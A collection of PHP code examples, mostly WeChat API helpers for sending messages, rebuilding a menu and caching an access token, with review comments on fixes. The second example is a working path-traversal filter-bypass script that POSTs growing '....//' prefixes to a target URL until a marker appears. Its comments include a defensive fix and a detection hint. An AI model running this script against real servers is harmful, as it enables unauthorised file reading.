示例#1
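    /**
     * Sends a single-article "news" customer-service message through the
     * WeChat custom-message endpoint.
     *
     * The request body is produced with json_encode() instead of string
     * concatenation, so a quote, backslash or control character in any of the
     * arguments can no longer break out of its JSON string and alter the
     * structure of the request.
     *
     * @param mixed  $uid         Cast to int; not otherwise used in the code shown here.
     * @param string $title       Article title, GBK-encoded (converted to UTF-8).
     * @param string $description Article description, GBK-encoded (converted to UTF-8).
     * @param string $url         Link opened by the article; sent as given.
     * @param string $picurl      Cover image URL; sent as given.
     * @return void
     */
    function wx_message($uid, $title, $description, $url, $picurl)
    {
        $uid = intval($uid);
        $Token = getToken($this->config);
        $WxUrl = 'https://api.weixin.qq.com/cgi-bin/message/custom/send?access_token=' . $Token;
        // The recipient is a masked placeholder in this listing.
        $Touser = '******';
        $Payload = array(
            'touser' => $Touser,
            'msgtype' => 'news',
            'news' => array(
                'articles' => array(
                    array(
                        // iconv() returns false on a failed conversion; the cast keeps
                        // the field an (empty) string, as the concatenation did.
                        'title' => (string) iconv('gbk', 'utf-8', $title),
                        'description' => (string) iconv('gbk', 'utf-8', $description),
                        'url' => (string) $url,
                        'picurl' => (string) $picurl,
                    ),
                ),
            ),
        );
        // Keep non-ASCII text and slashes literal, as in the hand-built body
        // (these flags need PHP 5.4 or later).
        $Data = json_encode($Payload, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES);
        if ($Data === false) {
            // A field is not valid UTF-8 (for example a non-UTF-8 $url): send nothing
            // rather than a malformed body.
            return;
        }
        CurlPost($WxUrl, $Data);
    }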
示例#2
// Command-line inputs of this test script.
// $argv[1]: URL that receives the POST request.
$url = $argv[1];
// $argv[2]: "field:file" pair, split on ':' further down.
$data = $argv[2];
// $argv[3]: marker string searched for in the response.
$needle = $argv[3];
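/**
 * POSTs $data to $url with cURL and returns the raw response.
 *
 * The handle is now closed before returning; the original curl_close() call
 * sat after the return statement and was never reached.
 *
 * NOTE(review): CURLOPT_SSL_VERIFYPEER is disabled, so the server certificate
 * is not validated and the connection can be intercepted. That is tolerable
 * only against a lab host with a self-signed certificate; any caller that
 * sends credentials or tokens through this helper should enable it.
 *
 * CURLOPT_HEADER is on, so the returned string starts with the response
 * headers; a caller that parses the body must strip them first.
 *
 * @param string       $url  Request URL.
 * @param array|string $data POST fields (array) or raw request body (string).
 * @return string|bool Response headers and body, or false when the request fails.
 */
function CurlPost($url = 'localhost', $data = array())
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 50);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    $response = curl_exec($ch);
    curl_close($ch);
    return $response;
}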
// Split the "field:file" argument into the POST field name and the file name.
list($param, $file) = explode(':', $data);
// NOTE(review): this script probes for a path-traversal filter that strips
// '../' from the input without re-checking the result. On the server side the
// fix is not another substring filter: resolve the requested path (e.g. with
// realpath()) and reject it unless it stays inside the intended base
// directory, or map user input to a fixed allow-list of file names.
$FilterBypassing = '....//';
// Up to ten requests, each with one more prefix segment than the last.
for ($i = 0; $i < 10; $i++) {
    $DataToPost[$param] = $FilterBypassing . $file;
    $response = CurlPost($url, $DataToPost);
    // A response containing the marker string ends the run.
    // Detection hint for defenders: repeated POSTs whose field value begins
    // with a growing run of '....//' are a strong signal in request logs.
    if (strstr($response, $needle) !== FALSE) {
        echo $response;
        echo "\n\nExploited successfully!\n";
        echo 'Payload: ', $DataToPost[$param], "\n\n\n";
        die;
    }
    $FilterBypassing .= '....//';
}
示例#3
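 /**
  * Rebuilds the WeChat custom menu from the rows of the `wxnav` table.
  *
  * Rows with keyid 0 become top-level buttons; every other row is attached as
  * a sub-button to the top-level row whose id equals its keyid. The existing
  * menu is deleted and the new one created, then "1" (success) or "2"
  * (failure) is echoed and the script ends.
  *
  * Changes from the concatenating version:
  *  - the body is produced with json_encode(), so a quote or backslash in a
  *    stored name, key or url cannot change the structure of the request;
  *  - $navlist is initialised, so an empty table no longer iterates an
  *    undefined variable;
  *  - a sub-row whose type is neither "click" nor "view" is skipped cleanly
  *    instead of leaving a stray comma in the output;
  *  - the body is built before the delete call, so an unencodable row no
  *    longer removes the live menu without a replacement.
  *
  * @return void
  */
 public function creat_action()
 {
     $list = $this->obj->DB_select_all("wxnav", "1 ORDER BY `keyid` ASC,`sort` ASC");
     if (is_array($list)) {
         $navlist = array();
         foreach ($list as $value) {
             if ($value['keyid'] == '0') {
                 $navlist[$value['id']] = $value;
             }
         }
         foreach ($list as $val) {
             foreach ($navlist as $key => $v) {
                 if ($v['id'] == $val['keyid']) {
                     $navlist[$key]['list'][] = $val;
                 }
             }
         }
         $buttons = array();
         foreach ($navlist as $value) {
             $subButtons = array();
             if (isset($value['list']) && is_array($value['list'])) {
                 foreach ($value['list'] as $v) {
                     // iconv() returns false on a failed conversion; the cast keeps
                     // the field an (empty) string, as the concatenation did.
                     if ($v['type'] == 'click') {
                         $subButtons[] = array(
                             'type' => 'click',
                             'name' => (string) iconv('gbk', 'utf-8', $v['name']),
                             'key' => (string) iconv('gbk', 'utf-8', $v['key']),
                         );
                     } elseif ($v['type'] == 'view') {
                         $subButtons[] = array(
                             'type' => 'view',
                             'name' => (string) iconv('gbk', 'utf-8', $v['name']),
                             // The url is sent as stored, without charset conversion.
                             'url' => (string) $v['url'],
                         );
                     }
                 }
             }
             $buttons[] = array(
                 'name' => (string) iconv('gbk', 'utf-8', $value['name']),
                 'sub_button' => $subButtons,
             );
         }
         // Keep non-ASCII text and slashes literal, as in the hand-built body
         // (these flags need PHP 5.4 or later).
         $CreatNav = json_encode(array('button' => $buttons), JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES);
         if ($CreatNav === false) {
             // A stored value is not valid UTF-8; report failure and leave the
             // current menu untouched.
             echo 2;
             die;
         }
         $Token = getToken($this->config);
         $DelUrl = 'https://api.weixin.qq.com/cgi-bin/menu/delete?access_token=' . $Token;
         CurlPost($DelUrl);
         $Url = "https://api.weixin.qq.com/cgi-bin/menu/create?access_token=" . $Token;
         $result = CurlPost($Url, $CreatNav);
         $Info = json_decode($result);
         // A reply that does not decode to an object counts as a failure.
         $ok = is_object($Info)
             && ((isset($Info->errcode) && $Info->errcode == '0')
                 || (isset($Info->errmsg) && $Info->errmsg == 'ok'));
         echo $ok ? 1 : 2;
         die;
     }
 }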
示例#4
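/**
 * Returns the WeChat access token, requesting a new one when the cached token
 * is more than 7000 seconds old.
 *
 * A refreshed token is stored back into the configuration through made_web().
 * If the token endpoint does not return an object carrying access_token, the
 * configuration is left untouched and null is returned. The previous version
 * stored an empty token with a fresh timestamp, which kept every caller on a
 * broken token until the 7000-second window ran out.
 *
 * NOTE(review): the app secret travels in the query string of the request URL,
 * so it can end up in proxy or debug logs, and it is only as well protected in
 * transit as the TLS settings of CurlPost() allow. Confirm that helper
 * verifies the server certificate.
 *
 * @param array $config Uses the keys token, token_time, wx_appid, wx_appsecret.
 * @return string|null The access token, or null when a refresh fails.
 */
function getToken($config)
{
    $Token = $config['token'];
    $TokenTime = $config['token_time'];
    $NowTime = time();
    if ($NowTime - $TokenTime <= 7000) {
        return $Token;
    }
    // Encode both values so a stray '&' or '=' cannot add or override a query parameter.
    $Url = 'https://api.weixin.qq.com/cgi-bin/token?grant_type=client_credential&appid='
        . rawurlencode((string) $config['wx_appid'])
        . '&secret=' . rawurlencode((string) $config['wx_appsecret']);
    $CurlReturn = CurlPost($Url);
    $Decoded = json_decode($CurlReturn);
    if (!is_object($Decoded) || empty($Decoded->access_token)) {
        // Error reply or unparsable body: do not persist anything.
        return null;
    }
    $config['token'] = $Decoded->access_token;
    $config['token_time'] = time();
    made_web(PLUS_PATH . "config.php", ArrayToString($config), "config");
    return $config['token'];
}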
示例#5
 /**
  * Posts a template message to the WeChat template-send endpoint.
  *
  * The access token comes from the global $config via getToken(). The reply
  * is decoded but not returned or inspected.
  *
  * @param string $wxid   Value sent as "touser".
  * @param string $tempid Value sent as "template_id".
  * @param string $url    Value sent as "url".
  * @param mixed  $data   Value sent as "data".
  * @return void
  */
 function sendWxTemplate($wxid, $tempid, $url, $data)
 {
     global $config;
     $endpoint = 'https://api.weixin.qq.com/cgi-bin/message/template/send?access_token=' . getToken($config);
     // Fields are assigned in the order they appear in the encoded body.
     $message = array();
     $message["touser"] = $wxid;
     $message["template_id"] = $tempid;
     $message["url"] = $url;
     $message["topcolor"] = "#FF0000";
     $message["data"] = $data;
     $body = json_encode($message);
     $rawReply = CurlPost($endpoint, $body);
     $reply = json_decode($rawReply);
 }